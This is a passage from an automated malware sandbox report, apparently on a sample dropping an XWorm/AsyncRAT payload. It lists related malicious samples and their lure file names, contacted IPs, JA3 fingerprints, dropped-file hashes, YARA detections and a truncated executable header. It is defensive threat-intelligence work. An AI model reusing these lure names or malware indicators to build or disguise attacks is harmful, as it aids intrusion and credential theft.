                                                                                                    • 13.107.246.63
                                                                                                    api.telegram.orgInvoice DHL - AWB 2024 E4001 - 0000731.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                    • 149.154.167.220
                                                                                                    c9toH15OT0.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 149.154.167.220
                                                                                                    9KEZfGRjyK.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 149.154.167.220
                                                                                                    9KEZfGRjyK.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 149.154.167.220
                                                                                                    PURCHASE ORDER TRC-090971819130-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                    • 149.154.167.220
                                                                                                    PAYMENT ADVICE 750013-1012449943-81347-pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                    • 149.154.167.220
                                                                                                    66776676676.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 149.154.167.220
                                                                                                    _Company.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 149.154.167.220
                                                                                                    F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                    • 149.154.167.220
                                                                                                    D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                    • 149.154.167.220

                                                                                                    ASNs

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    TELEGRAMRUhttps://l.facebook.com/l.php?u=https%3A%2F%2Ft.me%2FPAWSOG_bot%2FPAWS%3Fstartapp%3Dy6XarDUx%26fbclid%3DIwZXh0bgNhZW0CMTAAAR3IsDSVMcBgD-KKIyBXkOWfUkEFRcacr_vOCRRmviPmkFBUb89K461Xors_aem_phLdcKrpf4KWQzIltAO6sg&h=AT0WVJB1xqSKqrvz6oCyiCr2S_kisddMHHYmkei4Ws2sbL4pRphOmNE4PXT0dksI9PktkcW4m87_ll8cIS3t1M10038szd68S2XeJYojq6dQAb2PNvHsZFU9AcnVKku-Ww&__tn__=R%5D-R&c%5B0%5D=AT333mRdaoK-Yj4Ygf4lXueSR8jJ8CACMU4jPPhyx4Dd8BU65ez-7IWN-rjEtxmQ4vnelW50DVCFSTPJgFIJWEEx8TitUX4wIVY-t-NciHl77nL94VWL9IfsUrTxvCQB2zyPBhLoYnhspB5Xwyppb4fz5drOP91P-bJPoqSIEG9eoaQFOXaOYJeNVBj8A6jTCbgB-MXs3Mr2iqYLeO7DnF-q9v0FShLlwJK2Dtzfkv1OxBm45LKEAXAPoI199zlXmZpVMznjGet hashmaliciousUnknownBrowse
                                                                                                    • 149.154.167.99
                                                                                                    Invoice DHL - AWB 2024 E4001 - 0000731.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                    • 149.154.167.220
                                                                                                    ktyihkdfesf.exeGet hashmaliciousVidarBrowse
                                                                                                    • 149.154.167.99
                                                                                                    pjthjsdjgjrtavv.exeGet hashmaliciousVidarBrowse
                                                                                                    • 149.154.167.99
                                                                                                    c9toH15OT0.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 149.154.167.220
                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                    • 149.154.167.99
                                                                                                    9KEZfGRjyK.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 149.154.167.220
                                                                                                    9KEZfGRjyK.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 149.154.167.220
                                                                                                    file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, Blank Grabber, LummaC Stealer, PureLog StealerBrowse
                                                                                                    • 149.154.167.220
                                                                                                    file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                                                                    • 149.154.167.99
                                                                                                    CLOUDFLARENETUShttps://tekascend.com/Ray-verify.htmlGet hashmaliciousNetSupport RATBrowse
                                                                                                    • 1.1.1.1
                                                                                                    YgJ5inWPQO.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                    • 104.20.22.46
                                                                                                    http://url4659.orders.vanillagift.com/ls/click?upn=u001.4gSefN7qGt7uZc-2BljvSfDuK9c6f7zz-2BRDdNLkOmxp-2BfCpVRV4q5JSM05F18NmhW9aTh4D-2B-2FvKc3l62XSGdMxHErqjDyHVaRGnhWtdaxelWfxz8x2-2FY7A4qgb3tzDonO-2BR4v55hRVWLW8mGedQ4WKyhGmLG6TdN0VE3FuoaMfqbWnIJZADjzcMmwi0-2FbwmmeKkdfIhUk0sBHSi9RcRmdsfuOZwL5O2zEB6UFf08dp06kJXruK-2BF70HVCIIa3GSMCo48RLkzWG8dEOH-2FBZmckwy2IyrmhGk7TORgwM5bk4PbUxQPoYKq7IdXZDoj7BBWFZXgs6KkXD1kVfgQOsMLEKQeTvK5ATiMGw5YUv9FTPZiWgh4O-2B6hR3uc5gCam5ygOCJsmG3ya5dOP3AzZxmtrQO2ixrFnkLK-2Bkk5ChvTn26C-2BioOkvRUSczMMaDc3goe-2FffK-2FLybPlPtaG8BM0aogkRmbjy7uKwhjOW-2BFQyWewVzg-3DIgAR_79LTZgGyJjQA0yKF2CHqblXBaDJuc2sNW7Piu5vjvmdwcqDrB-2Buw9ZQukwHO-2BFDa1Pj-2BnPyP1wnuiUj8o1jeVFZ-2B0yTi1w6olXhC5xGcnSuX-2FPX8EC9nfY-2B3npShVzZ4Fae90bxak04TDiCsiP7PmtAOagYeRI4FU2qDP2MtD3eIC1vtRjmGkonGMDUW1rPFYKa2pBviC8swsnzOU26q7ssqOo-2FLjO6-2B2IyWprhTXXBsBk2HZWehLV3F8Prl0XOgIIe0Oi6f3V8mliLO9NN8Iw-3D-3DGet hashmaliciousUnknownBrowse
                                                                                                    • 104.19.230.21
                                                                                                    phish_alert_iocp_v1.10.16(15).emlGet hashmaliciousUnknownBrowse
                                                                                                    • 104.19.229.21
                                                                                                    https://lvxsystem.info/Get hashmaliciousUnknownBrowse
                                                                                                    • 172.67.183.243
                                                                                                    Set-up.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                    • 104.21.84.113
                                                                                                    Ziraat_Bankasi_Swift_Mesaji_TXB04958T.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                    • 172.67.177.134
                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, SystemBC, zgRATBrowse
                                                                                                    • 172.67.197.170
                                                                                                    Statement_3029_from_Cross_Traders_and_Logistics_ltd.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                    • 104.21.67.152
                                                                                                    Fortexternal.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 172.67.75.163
                                                                                                    TUT-ASUSfvbhdyuJYi.exeGet hashmaliciousXWormBrowse
                                                                                                    • 208.95.112.1
                                                                                                    8DiSW8IPEF.exeGet hashmaliciousXWormBrowse
                                                                                                    • 208.95.112.1
                                                                                                    twE44mm07j.exeGet hashmaliciousXWormBrowse
                                                                                                    • 208.95.112.1
                                                                                                    YgJ5inWPQO.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                    • 208.95.112.1
                                                                                                    KJhsNv2RcI.exeGet hashmaliciousXWormBrowse
                                                                                                    • 208.95.112.1
                                                                                                    gs7lQa4EuM.exeGet hashmaliciousXWormBrowse
                                                                                                    • 208.95.112.1
                                                                                                    doc00290320092.jseGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                    • 208.95.112.1
                                                                                                    file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, Blank Grabber, LummaC Stealer, PureLog StealerBrowse
                                                                                                    • 208.95.112.1
                                                                                                    DHL_231437894819.bat.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                    • 208.95.112.1
                                                                                                    dlhost.exeGet hashmaliciousXWormBrowse
                                                                                                    • 208.95.112.1

                                                                                                    JA3 Fingerprints

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    3b5074b1b5d032e5620f69f9f700ff0eYgJ5inWPQO.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                    • 104.20.3.235
                                                                                                    • 149.154.167.220
                                                                                                    P0RN-vidz.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                    • 104.20.3.235
                                                                                                    • 149.154.167.220
                                                                                                    2AIgdyA1Cl.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                    • 104.20.3.235
                                                                                                    • 149.154.167.220
                                                                                                    Sentinelled.vbsGet hashmaliciousUnknownBrowse
                                                                                                    • 104.20.3.235
                                                                                                    • 149.154.167.220
                                                                                                    mniscreenthinkinggoodforentiretimegoodfotbusubessthings.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                                    • 104.20.3.235
                                                                                                    • 149.154.167.220
                                                                                                    QUOTATION#008792.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                    • 104.20.3.235
                                                                                                    • 149.154.167.220
                                                                                                    Invoice DHL - AWB 2024 E4001 - 0000731.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                    • 104.20.3.235
                                                                                                    • 149.154.167.220
                                                                                                    https://p.placed.com/api/v2/sync/impression?partner=barkley&plaid=0063o000014sWgoAAE&version=1.0&payload_campaign_identifier=71700000100870630&payload_timestamp=5943094174221506287&payload_type=impression&redirect=http%3A%2F%2Fgoogle.com%2Famp%2Fs%2Fgoal.com.co%2Fwp%2FpaymentGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 104.20.3.235
                                                                                                    • 149.154.167.220
                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                                                                                    • 104.20.3.235
                                                                                                    • 149.154.167.220
                                                                                                    ktyihkdfesf.exeGet hashmaliciousVidarBrowse
                                                                                                    • 104.20.3.235
                                                                                                    • 149.154.167.220

                                                                                                    Dropped Files

                                                                                                    No context

                                                                                                    Created / dropped Files

                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:modified
                                                                                                    Size (bytes):64
                                                                                                    Entropy (8bit):0.34726597513537405
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Nlll:Nll
                                                                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                    Malicious:false
                                                                                                    Reputation:high, very likely benign file
                                                                                                    Preview:@...e...........................................................

                                                                                                    C:\Users\user\AppData\Local\Temp\System

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\2QaN4hOyJs.exe
                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):171520
                                                                                                    Entropy (8bit):6.697932609436561
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:cKH+Fd98QO+mUhijzD9hp3ksZfBKexpN9OA5G54oQ:3Ad9jWntkwfBKexpN9OAo54o
                                                                                                    MD5:0999F25F0123E520BB0259A5741F621B
                                                                                                    SHA1:27A3FD47F336DBF4663CBBE1BBDE7A3E76179247
                                                                                                    SHA-256:712AB1B048B49449D00E124E577E7EABE732252E0BA9CE3CEAD7EAF46F44903E
                                                                                                    SHA-512:03EFC0A5549017E46ABE03EAC0D73B169277491A38D33224DE32B916120F65FEFDF165A711EAB174AF30A66C9A7228EEE533D7C48D2648E8EADE053B39DB9188
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\System, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\System, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\System, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\System, Author: Joe Security
                                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\System, Author: ditekSHen
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                    • Antivirus: ReversingLabs, Detection: 82%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....odg................................. ........@.. ....................................@.................................D...W.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......(c...c............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_32soepen.1zi.psm1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3kooyniy.kmt.psm1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4cdlvctt.mnr.psm1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4fjvunm2.lyt.ps1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5cyx0450.u0l.ps1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_abitx31e.5uw.ps1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cpfsj2ox.qyi.ps1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e1tanuop.i10.psm1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fvk25rj5.hjb.ps1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_okslvnof.xsp.psm1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ouejitoj.raz.ps1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pslkevwm.ns3.psm1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qkab0uaz.hs4.ps1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s25zqpld.s4m.psm1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tyui4otr.qws.psm1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z1zbpppn.te2.ps1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
